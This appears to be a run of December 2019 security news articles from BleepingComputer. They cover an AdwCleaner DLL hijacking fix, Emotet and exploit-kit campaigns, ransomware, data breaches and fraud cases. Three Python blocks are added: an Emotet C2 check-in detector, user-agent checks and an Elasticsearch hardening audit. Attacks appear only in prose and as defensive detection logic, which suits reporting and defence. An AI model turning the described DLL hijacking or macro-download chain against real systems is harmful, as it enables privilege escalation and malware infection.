This allows an attacker or malware to create a malicious DLL with the same name as one that AdwCleaner normally loads and place it in an accessible folder in the user's path.

When AdwCleaner is launched it will attempt to load the required DLLs, including the malicious DLL. As AdwCleaner runs with Administrative privileges, this means that the malicious DLL will be executed with elevated privileges as well and can run malicious commands as an administrator.

Below you can see an example of the DLL Hijacking vulnerability being exploited using the Sentinel Vulnerability and Exploit Detector tool.

AdwCleaner DLL Hijacking
This vulnerability was discovered by Günter Born who disclosed it to Malwarebytes on December 10th, 2019.

Jérôme B, the developer of AdwCleaner, told BleepingComputer that this vulnerability was fixed by enforcing the loading paths to the DLLs.

"Yes, we didn't properly enforce the loading path for DLLs, so unprivileged users could add a specially crafted one and get privesc."

Other changes in AdwCleaner 8.0.1
While the DLL Hijacking vulnerability fix is definitely welcome, it is not the only improvement in this version.

With this release, AdwCleaner 8.0.1 once again has a Firefox cleaning module that can be used to scan for and remove malicious Firefox extensions, search engines, start pages, and preferences.

The full changelog for AdwCleaner 8.0.1 can be read below:

New Features
• Re-implement Firefox module. It now properly supports detecting and removing extensions, start page, search engines, preferences...
Changes
• Hide debug output
• Update telemetry internals.
• Update definitions to 2019.12.17.1
Bugfixes
• Fix a DLL Hijacking vulnerability in AdwCleaner 7.0+, reported by Günter Born.


Fake Star Wars Streaming Sites Steal Fans’ Credit Cards
21.12.2019
Bleepingcomputer  CyberCrime

Attackers are actively exploiting the hype around the new Star Wars: The Rise of Skywalker movie as bait designed to lure potential victims to fake streaming sites and steal their credit card data.

Given that the movie will be released in theaters on December 20, phishers have the perfect decoy to attract fans who would want to get an early look at the new Star Wars movie.

Highly popular films are often used as bait in social engineering attacks that draw the attention of fans with the promise of an early preview, either on decoy streaming sites or with the help of malicious files camouflaged as early release movie copies.

Fake Star Wars streaming site (Kaspersky)
Over 30 sites used in credit card phishing attacks
"Kaspersky researchers found over 30 fraudulent websites and social media profiles disguised as official movie accounts (the actual number of these sites may be much higher) that supposedly distribute free copies of the latest film in the franchise," a press release published today says.

"These websites collect unwary users’ credit card data, under the pretense of necessary registration on the portal."

Kaspersky's research team also found 65 malicious files that were camouflaged as copies of the Star Wars: The Rise of Skywalker movie, as well as several profiles on Twitter and other social media platforms disguised as official accounts that distribute free copies of the movie and promote the malicious streaming sites.

Actually, instead of getting a free pirated copy of the new Star Wars installment, the victims would get their computers infected with malware.

"Coupled with malicious files shared on torrents, this brings the criminals results," Kaspersky says. "So far, 83 users have already been affected by 65 malicious files disguised as copies of the upcoming movie."

“Star Wars”-themed malware attacks

                          2018      2019      Change
Attacks detected          257580    285103    10.00%
Number of unique files    16395     11499     -30.00%
Users targeted            50196     37772     -25.00%

Star Wars fans advised to proceed with caution
The researchers also found that the hype surrounding this movie franchise fueled such attacks throughout 2019, with 285,103 attempts to infect 37,772 users seeking to watch Star Wars movies being detected by Kaspersky this year, accounting for a 10% rise compared to last year.

Overall, the number of unique malicious files used by attackers to target Star Wars fans reached 11,499 in 2019, representing a 30% drop from 2018.

Kaspersky recommends that movie and TV show fans follow these guidelines to avoid getting infected with malware or getting their credit card data stolen:

• Pay attention to the official movie release dates in theaters, on streaming services, TV, DVD, or other sources
• Don’t click on suspicious links, such as those promising an early view of a new film
• Look at the downloaded file extension. Even if you are going to download a video file from a source you consider trusted and legitimate, the file should have a .avi, .mkv or .mp4 extension, among other video formats, definitely not .exe
• Check the website’s authenticity. Do not visit websites allowing you to watch a movie until you are sure that they are legitimate and start with ‘https.’ Confirm that the website is genuine by double-checking the format of the URL or the spelling of the company name, reading reviews about it and checking the domains’ registration data before starting downloads
• Use a reliable anti-malware solution
"It is typical for fraudsters and cybercriminals to try to capitalize on popular topics, and ‘Star Wars’ is a good example of such a theme this month," Kaspersky security researcher Tatiana Sidorina states.

"As attackers manage to push malicious websites and content up in the search results, fans need to remain cautious at all times. We advise users to not fall for such scams and instead enjoy the end of the saga on the big screen."


Lithuanian Jailed for Stealing $120 Million From Google, Facebook
21.12.2019
Bleepingcomputer  Crime  Social

A Lithuanian man was sentenced today to five years of prison time after tricking Google and Facebook employees into wiring over $120 million into bank accounts he controlled as part of several business email compromise (BEC) fraud attacks spanning from 2013 to 2015.

He previously pleaded guilty to wire fraud, aggravated identity theft, and three counts of money laundering according to a Department of Justice press release from March 2019.

"Evaldas Rimasauskas devised an audacious scheme to fleece U.S. companies out of more than $120 million, and then funneled those funds to bank accounts around the globe," U.S. Attorney Geoffrey S. Berman said today.

"Rimasauskas carried out his high-tech theft from halfway across the globe, but he got sentenced to prison right here in Manhattan federal court."

As detailed in the guilty plea court documents, Rimasauskas agreed to forfeit $49,738,559.41 to the United States, "the amount of proceeds traceable to the offense in Count One of the Indictment that the defendant personally obtained," representing the wire fraud charge.

Evaldas Rimasauskas before extradition verdict (Image: REUTERS/Andrius Sytas)
$99 million stolen from Facebook, $23 million from Google
According to the indictment, Rimasauskas registered and incorporated a company in Latvia using the same name as the Asian computer hardware manufacturer Quanta Computer Inc.

He also opened multiple bank accounts at banks from Cyprus, Lithuania, Hungary, Slovakia, and Latvia that he would later use to receive the fraudulent payments.

Phishing emails were then sent to Google and Facebook employees who "regularly conducted multimillion-dollar transactions with" Quanta representatives, instructing them to deliver large sums of money to Rimasauskas accounts.

He also used "forged invoices, contracts, and letters that falsely appeared to have been executed and signed by executives and agents of the Victim Companies, and which bore false corporate stamps embossed with the Victim Companies’ names, to be submitted to banks in support of the large volume of funds that were fraudulently transmitted via wire transfer."

After the funds were deposited in his accounts, Rimasauskas scattered the money to other bank accounts from six countries, trying to cover his tracks.

In addition to the prison term, Judge Daniels ordered RIMASAUSKAS to serve two years of supervised release, to forfeit $49,738,559.41, and to pay restitution in the amount of $26,479,079.24. - DoJ

Even though the indictment did not specifically identify Google and Facebook as the US companies that got tricked in the BEC scammer's attacks, Reuters reported that "a Lithuanian court order in 2017 identified Google and Facebook as the victims."

"We detected this fraud and promptly alerted the authorities. We recouped the funds and we're pleased this matter is resolved," a Google spokesperson told Bleeping Computer after Rimasauskas plead guilty in March, confirming that the company was targeted in Rimasauskas' BEC attacks.

The FBI said in a BEC public service announcement issued in September that victim complaints related to 166,349 domestic and international incidents were received between June 2016 and July 2019, revealing a total exposed dollar loss of more than $26 billion.

In July, the Financial Crimes Enforcement Network (FinCEN) also issued a report stating that BEC SAR (short for suspicious activity reports) filings increased from a $110 million monthly average during 2016 to more than $301 million per month in 2018.


Exploit Kit Starts Pushing Malware Via Fake Adult Sites
21.12.2019
Bleepingcomputer  Exploit  Virus

Spelevo exploit kit's operators have recently added a new infection vector as part of their attacks, attempting to social engineer potential targets into downloading and executing additional malware payloads from decoy adult sites.

This exploit kit was initially spotted by security researcher Kafeine back in early March 2019, and it has been used as a delivery platform for the infamous IcedID and Dridex banking trojans, as Cisco Talos found in June, and to drop Maze Ransomware payloads, as researcher nao_sec discovered.

While normally exploit kits will only redirect victims to a landing page using a traffic direction system (TDS) and hit them with an exploit designed to abuse vulnerable apps on their computer, this time the attackers behind Spelevo EK decided to include a new social engineering tactic as a backup infection vector.

Spelevo infection chain (Malwarebytes)
"Recently, we captured an unusual change with the Spelevo exploit kit where, after an attempt to trigger vulnerabilities in Internet Explorer and Flash Player, users were immediately redirected to a decoy adult site," Malwarebytes security researcher Jérôme Segura said.

After failing to exploit any of the Internet Explorer and Flash Player vulnerabilities it targets to infect the victims' devices with the Ursnif (aka Gozi) banking Trojan, Spelevo EK will automatically redirect the targets to a decoy adult site where they will be asked to download and install a video codec to play the videos.

By adopting this new social engineering tactic, the attackers will still have a chance to drop additional malware payloads, Qbot banking Trojans in this case, even when the exploit kit fails to lead to successful infection.

"Based on our telemetry, there are a few campaigns run by threat actors converting traffic to adult sites into malware loads," Segura adds. "In one campaign, we saw a malvertising attack on a site that draws close to 50 million visitors a month."

Before these recent campaigns, Spelevo EK would also redirect victims post-exploitation but, instead of decoy adult sites, it would deliver the victims to google.com after a 10-second delay.

Spelevo redirecting to decoy site (Malwarebytes)
Once they land on the fake adult website, the targets will be asked to download the fake video codec which, once downloaded and executed, will launch a Qbot banking Trojan instance as already mentioned.

"Downloading video codecs to view media used to be fairly common back in the day, but isn’t really the case anymore," Segura explains. "Yet, this kind of trick still works quite well and is an alternative method to compromise users."

This new tactic adopted by Spelevo EK's operators increases the number of infection vectors used in their campaigns, making them more effective in the long run.

Decoy adult site pushing fake video codec (Malwarebytes)
Other exploit kits have also turned to social engineering to improve their "hit rate" in the past, with Magnitude EK and Disdain EK adopting this additional attack tactic in 2017 via fake Windows Defender and Flash Player alerts.

Fallout EK also switched to social engineering in 2018, displaying fake antivirus and Flash Player prompts that would attempt to infect targets from the government, telecom, and healthcare sectors that had fully patched machines.


Emotet Malware Uses Greta Thunberg Demonstration Invites as Lure
21.12.2019
Bleepingcomputer  Virus

Emotet has started a new spam campaign that is banking on the popularity of environmental activist Greta Thunberg and her dedication to the climate movement. Unsuspecting users who think they are getting info about an upcoming "climate crisis" demonstration will instead find that they have become infected with Emotet and other malware.

This new campaign was discovered by ExecuteMalware and pretends to be an invite to a new climate change demonstration by Greta Thunberg and uses email subjects such as "Demonstration 2019" or "I invite you" to entice you into opening the email. The spam even recommends that you forward the email on to your friends and family.

Greta Thunberg Malspam
The full text of this email is:

MERRY CHRISTMAS

You can spend Christmas Eve looking for gifts for children. They will tell you Thank you only that day.
But the children will thank you all their lives if you come out for the biggest demonstration in protest against the inaction of the government in connection with the climate crisis.
Support Greta Thunberg - Time Person of the Year 2019

I invite you. Time and address are attached in the attached file.

FORWARD this letter to all colleagues, friends and relatives RIGHT NOW, until you forget!

Many thanks.
Attached to these emails is a malicious Word document attachment called "Support Greta Thunberg.doc". If a user opens this document they will be met with a prompt to click on the "Enable editing" and then "Enable content" buttons to see the demonstration information.

Malicious Word Document Attachment
If the Enable Content button is clicked, a malicious macro will launch a PowerShell command that downloads the Emotet Trojan and executes it.

Downloaded malware
When successful, the Trojan will quietly run in the background, while using your computer to send out further spam and downloading more malware onto your computer.

As always, never open attachments from anyone without confirming over the phone that they did indeed send you the file. You should also always be cautious of enabling content or macros on any attachment you receive.

When receiving unknown documents, it is always safe to upload the attachment to VirusTotal to check for malicious macros before opening it.


Nexus Mods Game Modding Site Discloses Data Breach
21.12.2019
Bleepingcomputer  Incindent

The popular game modification site Nexus Mods has announced a security incident that may have exposed the registration information for its users.

Nexus Mods is a site where users can download modifications for games such as Skyrim, Fallout, Witcher, Dragon Age, and many more.

In order to download mods from the site, users must first register an account on the site, which has led to a user base of close to 19 million registered members.

In a security notice posted to their site today, Nexus Mods has disclosed that an unauthorized actor hacked their services on November 8th, 2019 through an exploit in their legacy codebase.

"In the very early morning of 8th November 2019 we noticed suspicious activity by a potentially malicious third party actor against our services. Using an exploit in our legacy codebase, our logs confirm that they accessed a small number of user records from the old user service."

When they discovered the breach, Nexus Mods states that they secured the affected endpoints and moved the release schedule for the next version of the site to quickly retire their legacy codebase.

Unfortunately, they cannot rule out that the exploit was used in the past to access other user data such as members' email addresses, password hashes, and salts.

Therefore, it is strongly suggested that all users change their passwords on the site, especially those who reuse the same password at every site.

It is also suggested that you use a password manager to create unique passwords at every site you visit so that if your information is disclosed at a data breach, it cannot affect your accounts at other sites.

Nexus Mods warns that users should be vigilant for potential phishing or credential stuffing attacks that utilize their registration email and password.

BleepingComputer has reached out to Nexus Mods with questions but has not heard back at this time.


Emotet Gang Changes Tactics Ahead of the Winter Holidays
21.12.2019
Bleepingcomputer  Virus

With the end of the year approaching fast, the authors of Emotet have made some changes that may increase their revenue for the holidays.

One of the modifications refers to the URI structure clients use to check into the command and control servers. Another change is the malware delivery method.

Checking into C2 servers
In late November, security researchers at email security company Cofense Labs noticed that Emotet code on the client side no longer used random paths based on a word list to reach the command and control (C2) server.

Introduced in early 2019, this structure was discarded in favor of a seemingly random string of at least four characters. A more careful look into this revealed that the path was "actually the key from the key/value pair in the posted form data."

Emotet client new URI structure (November 27)
The change appears to be more on the cosmetic side since it does not affect the check-in data significantly.

Cofense researchers believe this to be "a rudimentary attempt at identifying researchers who are running emulation code alone" because the check-in structure would not suffer modifications upon updating the malware code base.
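The path-equals-form-key pattern described above lends itself to a simple proxy-log check. The following Python is an added example, not code from Cofense or the article: it parses a raw HTTP request and flags a form-encoded POST whose single field key is also the sole path segment. The minimum key length of four comes from the article; treating the body as exactly one key/value pair is an assumption, and the sample requests and the TEST-NET host are constructed.

```python
from urllib.parse import parse_qs


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def looks_like_emotet_checkin(raw, min_key_len=4):
    """True when the request matches the late-2019 Emotet check-in shape:
    a form-encoded POST with exactly one field (assumption) whose key is also
    the only path segment, a short random alphanumeric string."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST":
        return False
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return False
    segments = [s for s in path.split("?", 1)[0].split("/") if s]
    if len(segments) != 1:
        return False
    key = segments[0]
    if len(key) < min_key_len or not key.isalnum():
        return False
    form = parse_qs(body, keep_blank_values=True)
    return len(form) == 1 and key in form


def _request(path, body, content_type="application/x-www-form-urlencoded"):
    """Assemble a constructed request for the samples below (203.0.113.0/24 is TEST-NET-2)."""
    return (
        "POST %s HTTP/1.1\r\nHost: 203.0.113.10\r\nContent-Type: %s\r\n"
        "Content-Length: %d\r\n\r\n%s" % (path, content_type, len(body), body)
    )


# Constructed samples, not real captures: one Emotet-style check-in and two ordinary form posts.
EMOTET_STYLE = _request("/JXhtPgj", "JXhtPgj=dGVzdGRhdGE")
LOGIN_FORM = _request("/login", "user=alice&pass=example")
SEARCH_FORM = _request("/search", "q=elastic")
```

Run over proxy or IDS HTTP logs, the check is cheap enough to apply to every outbound POST and only fires on the key/path coincidence, so ordinary form submissions such as the login and search samples pass through untouched.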

Old tactic returns
Following a summer break, Emotet operators restarted activity in September delivering emails with malicious attachments. This was a shift in tactics as previously they used link-based email templates for the task.

In the latest campaigns, Emotet returned to the old habit that proved to be an efficient delivery method. The researchers say that using link-based templates again is probably an attempt to maximize victim count ahead of the winter holidays.

Emotet spam

The current campaigns take advantage of the holiday season and send out emails pretending to be from shipping companies, a theme not at all unusual this time of the year.

Another lure noticed by the researchers is an email template with an "Open Enrollment 2020" theme, targeting users who still have to choose a health insurance program for 2020. However, this lure should no longer be successful, as the deadline for making a decision expired on December 15 for most individuals.

As for the payload, TrickBot remains the main malware in recent campaigns. The researchers say they observed "heavy distribution," which could indicate one last effort to make money before the winter break.

According to past observations, Emotet distribution has its periods of inactivity which typically coincide with holiday seasons. In 2019, spam campaigns from this botnet started on January 13 and died towards the end of May.

Towards the end of August, Emotet's C2 servers activated once again and spam campaigns started in mid-September.


Vivaldi Now Impersonates Google Chrome to Avoid Being Blocked
21.12.2019
Bleepingcomputer  Security

With today's release of the new Vivaldi 2.10, the browser will impersonate Google Chrome when visiting certain sites. It does this to prevent the browser from being blocked based on its user agent.

Even though Vivaldi is a Chromium-based browser and should be supported at every site that supports Chrome, many sites will block the browser based on its user agent.

A user agent is a string that is sent to a site to let it know the name and the version of the browser being used. Normally when browsing the web, Vivaldi will send the site a user agent that contains its name as seen below.

Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.94 Safari/537.36 Vivaldi/2.10.1745.18
Certain sites that detect the 'Vivaldi' string in the user agent will block the browser and state that it is not supported. These sites will then recommend Google Chrome, which is silly as both browsers use the same HTML rendering engine.

Vivaldi blocked at a site
To Vivaldi CEO Jon von Tetzchner, the browser's name in the user agent is a source of pride. Unfortunately, he feels that sites are blocking the browser for competitive reasons and hurting Vivaldi's users. This change will prevent that going forward.

“The primary reason to show Vivaldi in the user agent is a level of pride. That pride, however, is hurting us, as our competitors and others are using this to block us from their services. That is why with today’s update, we’ve drawn a line in the sand so that you can browse more websites without a glitch,” Tetzchner stated in today's announcement.

Due to this, with the Vivaldi 2.10 update, the browser will now switch from its normal Vivaldi user agent to Google Chrome's user agent shown below.

Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.94 Safari/537.36
Unfortunately, other browsers have had to use similar techniques in order to avoid web site blocks based on user agents.

The new Chromium-based Microsoft Edge also uses a similar method to avoid being blocked even though it too uses the same Blink rendering engine as Chrome.

To get past this, Edge also had to impersonate other browsers at certain sites in order for these sites to work properly.
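The two user agent strings quoted above differ only in the trailing Vivaldi/ token, which is why a brand check breaks a browser whose engine is identical. The following Python is an added example, not code from Vivaldi or the article: it tokenizes both strings and contrasts the brittle brand gate with a check keyed on the Chrome/ engine token that every Chromium build carries. The minimum engine version of 70 is an assumed threshold.

```python
import re

# The two user agent strings quoted in the article.
VIVALDI_UA = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/79.0.3945.94 Safari/537.36 Vivaldi/2.10.1745.18")
CHROME_UA = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/79.0.3945.94 Safari/537.36")

# Every 'Product/version' token, e.g. Chrome/79.0.3945.94 or Vivaldi/2.10.1745.18.
_PRODUCT = re.compile(r"([A-Za-z][\w.]*)/([\d.]+)")


def product_tokens(ua):
    """Map each product token in a user agent string to its version string."""
    return dict(_PRODUCT.findall(ua))


def chromium_major(ua):
    """Major version of the Chrome/ token, which every Chromium-based build advertises;
    None when the string is not from a Chromium engine at all."""
    version = product_tokens(ua).get("Chrome")
    return int(version.split(".")[0]) if version else None


def brand_gate(ua):
    """The brittle check the article describes: only a browser branded Chrome gets through,
    so Vivaldi is refused although its engine tokens are identical."""
    tokens = product_tokens(ua)
    return "Chrome" in tokens and "Vivaldi" not in tokens


def engine_gate(ua, min_major=70):
    """Engine-oriented alternative (assumed threshold): accept any Chromium build at or above
    the engine version the site was tested against, whatever it is branded."""
    major = chromium_major(ua)
    return major is not None and major >= min_major
```

Feature detection in the page's own JavaScript removes the dependence on the user agent string altogether; the engine check is only the lesser evil when server-side gating cannot be avoided.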


Canadian Insurance Firm Hit By Maze Ransomware, Denies Data Theft
21.12.2019
Bleepingcomputer  Ransomware

An insurance and financial services company based out of Manitoba, Canada is the latest victim of the Maze Ransomware with allegedly 245 computers encrypted during a cyberattack in October.

The victim, Andrew Agencies, is a full-service insurance company with 125 employees and 18 locations based out of Manitoba, Saskatchewan, and Alberta, Canada.

According to emails sent to BleepingComputer from the operators of the Maze Ransomware, Andrew Agencies was attacked on October 21st, 2019 when the attackers breached their network and encrypted 245 computers.

As "proof" of the attack, Maze sent BleepingComputer a list of 245 encrypted computers, their IP addresses, computer names, and sizes of the data encrypted by the ransomware. Based on the encrypted sizes listed in this proof, the Maze Ransomware states they have encrypted a total of 63 terabytes of data.

The operators have also released a text file containing a list of 876 user names and hashed passwords for users on the network.

Maze told BleepingComputer that the ransom amount was $1.1 million, or 150 bitcoins, at the time of the attack and that Andrew Agencies was originally in communication with them, but then stopped responding.

"They are really good canadian guys, but they have disappeared. They came up to decision that they should buy decryptor and asked us for time as they are collecting money," the Maze operators told BleepingComputer via email.

Maze stated that their deadline for paying the ransom under threat of the company's data being published was at the end of November. While the data has not been publicly released as of yet, Maze is known for following through with these threats as seen by Maze's attack on Allied Universal.

Dave Schioler, the Executive Vice President & General Counsel for Andrew Agencies, confirmed that they had been in communication with the attackers while conducting an investigation.

In a statement released today, Schioler states the company has chosen not to pay the ransom and that there is no evidence that any sensitive personal information or data has been stolen.

"At this time, Andrew Agencies can confirm that it has recently dealt with a security breach incident involving ransomware. Our data and that of our customers and employees is of the utmost importance to us. We have taken this matter very seriously and have expended considerable resources in the investigation and remediation of this incident, including the use of third parties with expertise in similar incidents. We have put in place any and all steps necessary for remediation.

We also wish to emphasize that as a result of our investigation, we have uncovered no evidence of sensitive personal information or data being stolen or otherwise compromised. While we are not at liberty to share the particulars of the investigation with you, we can advise that the incident has had minimal impact on our operations. Andrew Agencies did not pay a ransom as part of the recovery effort.

We are confident with our operating status and security, and we therefore do not intend to be providing further commentary on this matter."

This statement, though, is disputed by the Maze operators who told us that they stole 1.5GB of data "about insurance customers."

No proof of these stolen documents has been shared with BleepingComputer at this time.

BleepingComputer has sent follow-up questions regarding the stolen data to Andrew Agencies, but has not heard back at this time.

Ransomware attacks are becoming data breaches
The actors behind the Maze Ransomware have upped the ante when it comes to ransomware attacks by releasing stolen data if a ransom has not been paid.

As we have said numerous times, it is not unknown for attackers, including ransomware actors, to steal data or snoop through a company's files before encrypting them.

Maze, though, has been the only threat group that has released files when a victim chooses not to pay a ransom.

This has led another high-profile ransomware group, REvil (also known as Sodinokibi), to follow in their footsteps.

When ransomware actors release a company's data, this attack becomes a data breach that will require government and customer notifications and the potential of lawsuits for exposed data.


Siemens Contractor Jailed for Sabotage With Logic Bombs
21.12.2019
Bleepingcomputer  Hacking

Former Siemens contract employee David Tinley was sentenced to six months in prison for sabotaging his employer over a span of roughly two years using logic bombs planted in company spreadsheets.

The end goal of his efforts was to cause Siemens to ask for his services at the firm's Monroeville, PA location to repair the malfunctioning software.

62-year-old Tinley pleaded guilty to the charge of intentional damage to a protected computer in July 2019, and the conviction also came with an additional two-year term of supervised release and a $7,500 fine.

Tinley faced a maximum total sentence of 10 years in prison for the charges, a maximum fine of $250,000, and a maximum term of supervised release of three years according to court documents.

The plea agreement stipulated a total loss amount of $42,262.50 according to the United States Sentencing Guidelines.

Siemens contract employee sentenced for intentionally inserting logic bombs into computer programs he designed, causing company to hire him to fix the malfunctions https://t.co/F1eKipSipC

— WDPAnews (@WDPAnews) December 17, 2019
The spreadsheet logic bombs
According to a Law360 report, Tinley planted logic bombs designed to trigger automatically after a set time and randomly crash a series of spreadsheets he had designed to automatically calculate customer order cost estimates and workflow.

While his spreadsheets worked without flaw for years, starting in 2014 they suddenly began randomly crashing and glitching because of the logic bombs he inserted within the password-protected code.

This prompted Siemens to ask Tinley to fix the issue for a set fee. Each time his services were required, he would go in, edit the spreadsheets' code, and modify the date when they would again start crashing, according to Assistant U.S. Attorney Shardul S. Desai.

According to information presented to the court, from in and around 2014 and continuing until on or about May 13, 2016, Tinley intentionally inserted logic bombs into computer programs that he designed for Siemens Corporation. The logic bombs ensured that the programs would malfunction after the expiration of a certain date. As a result, Siemens was unaware of the cause of the malfunction and required Tinley to fix these malfunctions. - DoJ press release

The scheme worked for about two years, until May 13, 2016, when it was discovered after Tinley, who was out of town, had to give his password to Siemens employees because of a time-sensitive deadline that required the spreadsheets to work.

This is not the first instance of logic bombs being planted on computers documented by the U.S. DoJ, as shown by previous cases of employees being sentenced, charged with, or pleading guilty to inserting such code on public systems or their companies' systems [1, 2, 3, 4, 5].


Honda Exposes 26,000 Records of North American Customers
21.12.2019
Bleepingcomputer  Incident

Automotive giant Honda exposed roughly 26,000 vehicle owner records containing personally identifiable information (PII) of North American customers after misconfiguring an Elasticsearch cluster on October 21, 2019.

Honda's security team in Japan promptly secured the publicly accessible server within just a few hours after being contacted by Security Discovery researcher Bob Diachenko on December 12.

The researcher discovered the database on December 11 and was able to access the data without authentication after the BinaryEdge Internet-connected device search engine indexed the database on December 4.

Exposed Honda vehicle owner data
The database records included the customers' full names, email addresses, phone numbers, mailing addresses, vehicle make and model, vehicle VINs, agreement IDs, and various service information on their Honda vehicles.

"The database in question is a data logging and monitoring server for telematics services for North America covering the process for new customer enrollment as well as internal logs," Honda told Diachenko in a statement.

"As of today, Honda estimates the number of unique consumer-related records in this database to be around 26,000."

The company also said that none of its North American customers' financial info, credit card data, or credentials were exposed in the incident.

While the company reacted very promptly after being informed that the misconfigured Elasticsearch cluster was publicly accessible on the Internet, Diachenko says that their week-long public exposure "would have allowed malicious parties ample time to copy the data for their own purposes if they found it."

Honda is continuing to perform due diligence, and if it is determined that data was compromised, we will take appropriate actions in accordance with relevant laws and regulations. We will continue to work on proactive security measures to prevent similar incidents in the future. - Honda

"The information in this database could be valuable to criminals if they managed to find it before the server was shut down," the researcher adds. "It is best to assume the worst and take steps to protect yourself if you think you might be impacted."

The Honda customers' info might be used in highly targeted phishing attacks in the future if the information was leaked during the week the database was exposed.

Such attacks could be used by threat actors to steal sensitive information like user credentials and financial data or to infect their targets' computers with malware if the phishing messages also deliver malicious payloads.

[NEW REPORT] Honda exposes vehicle owner records - again (names, emails, VIN, mailing addresses and service records). Company acted promptly and secured the server within hours after initial notification. Read more: https://t.co/MeHDkxLSrc

— Bob Diachenko (@MayhemDayOne) December 18, 2019
Previous Honda data exposure and breach incidents
Honda was involved in similar incidents in the past, with the most recent one from July 2019 also involving a publicly accessible ElasticSearch database that exposed 134 million documents containing 40 GB worth of info on approximately 300,000 Honda employees around the globe.

As part of that breach, Honda's CEO info was also exposed with the open database revealing his full name, account name, email, and last login date, as well as info related to his work computer, including "MAC address, which Windows KB/patches had been applied, OS, OS version, endpoint security status, IP, and device type."

In 2018, Honda India also left customers' PII on two public Amazon S3 buckets for at least three months, exposed to anyone with an Internet connection and the expertise needed to find it.

The records contained customer names, genders, phone numbers, email addresses, and account passwords, as well as car VIN information, and the buckets were taken offline after repeated attempts to get in touch with the company spanning almost two weeks.

Further back, in 2010, Honda warned its customers of a hacking incident involving an e-mail list that gave the attackers access to 2.2 million Honda vehicle owners' names, e-mail addresses, and vehicle VINs, as well as to 2.7 million Acura customers' e-mail addresses after gaining access to a second list.

How to secure an ElasticSearch cluster
Even though Elastic Stack's core security features have been free since May, per an announcement made by Elastic NV, publicly accessible and unsecured ElasticSearch clusters are constantly being spotted by security researchers scouring the web for unprotected databases.

"This means that users can now encrypt network traffic, create and manage users, define roles that protect index and cluster level access, and fully secure Kibana with Spaces," ElasticSearch's developers say.

Elasticsearch servers should only be accessible on the company's local network, so that only the database's owners can reach them, as ElasticSearch's dev team explained back in December 2013.

Elastic NV also recommends that database admins secure their ElasticSearch stack by "encrypting communications, role-based access control, IP filtering, and auditing," by properly configuring the cluster before deploying it, and by setting passwords for the servers' built-in users.
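The recommendations above map onto a handful of settings in elasticsearch.yml, and the exposure pattern behind the Honda incident is a node bound to a routable interface with security left off. The following Python is an added example, not Elastic's code or anything from the article: a small audit that parses a flat elasticsearch.yml and reports the weak combinations. Setting names are real Elasticsearch 7.x settings; the two sample files, the cluster name and the addresses are constructed.

```python
# Loopback-only bindings: the node is unreachable from the network, so nothing else applies.
LOOPBACK_ONLY = {"_local_", "localhost", "127.0.0.1", "::1"}
# Bindings that expose the node on every interface the host has.
WILDCARD_BINDINGS = {"0.0.0.0", "::", "_global_", "_site_"}


def parse_flat_yaml(text):
    """Parse 'dotted.key: value' lines, the usual elasticsearch.yml style; skips comments and
    blank lines. Nested YAML mappings are out of scope for this audit."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip("\"'")
    return settings


def is_on(settings, key):
    """An absent flag counts as off, the 7.x default for these settings under the basic license."""
    return settings.get(key, "false").lower() in ("true", "yes", "on", "1")


def audit(text):
    """Return (severity, message) findings for one elasticsearch.yml; empty list means clean."""
    cfg = parse_flat_yaml(text)
    findings = []
    host = cfg.get("network.host", "_local_")     # unset: Elasticsearch binds to loopback
    if host in LOOPBACK_ONLY:
        return findings
    reach = "every interface" if host in WILDCARD_BINDINGS else "network.host=%s" % host
    if not is_on(cfg, "xpack.security.enabled"):
        findings.append(("HIGH", "listening on %s with security disabled: any client that can reach "
                         "port 9200 can read, change or delete every index without credentials" % reach))
    else:
        if not is_on(cfg, "xpack.security.http.ssl.enabled"):
            findings.append(("MEDIUM", "REST API without TLS: credentials and documents cross the "
                             "network in cleartext"))
        if not is_on(cfg, "xpack.security.transport.ssl.enabled"):
            findings.append(("MEDIUM", "node-to-node transport without TLS"))
    if "xpack.security.http.filter.allow" not in cfg:
        findings.append(("LOW", "no IP filter on the HTTP layer: restrict clients to the networks "
                         "that need access"))
    if not is_on(cfg, "xpack.security.audit.enabled"):
        findings.append(("LOW", "audit logging off: unauthorised reads would leave no record"))
    return findings


# Constructed sample: what an exposed logging cluster typically looks like.
WEAK_CONFIG = """
cluster.name: telematics-logging
node.name: log-1
network.host: 0.0.0.0      # reachable from anywhere the host is routable
http.port: 9200
discovery.type: single-node
"""

# Constructed sample: the same node bound to an internal address with the security stack on.
HARDENED_CONFIG = """
cluster.name: telematics-logging
node.name: log-1
network.host: 10.20.30.5
http.port: 9200
discovery.type: single-node
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.transport.ssl.enabled: true
xpack.security.http.filter.allow: "10.20.0.0/16"
xpack.security.audit.enabled: true
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(text) or "no findings")
```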



Microsoft Security Essentials To Get Updates After Windows 7 EoS
21.12.2019
Bleepingcomputer  OS

Microsoft Security Essentials (MSE) will continue to receive definition updates for new malware after Windows 7 reaches End of Support, even though a Microsoft support bulletin states otherwise.

Microsoft's FAQ about Extended Security Updates for Windows 7 states that after Windows 7 reaches EoS, MSE will no longer protect a Windows 7 computer.

Will Microsoft Security Essentials (MSE) continue to protect my computer after the end of support?

No, your Windows 7 computer is not protected by MSE after January 14, 2020. MSE is unique to Windows 7 and follows the same lifecycle dates for support. Learn more about MSE.

This was concerning for users who continue to use MSE on Windows 7, as it meant they would have to get new antivirus software to stay protected.

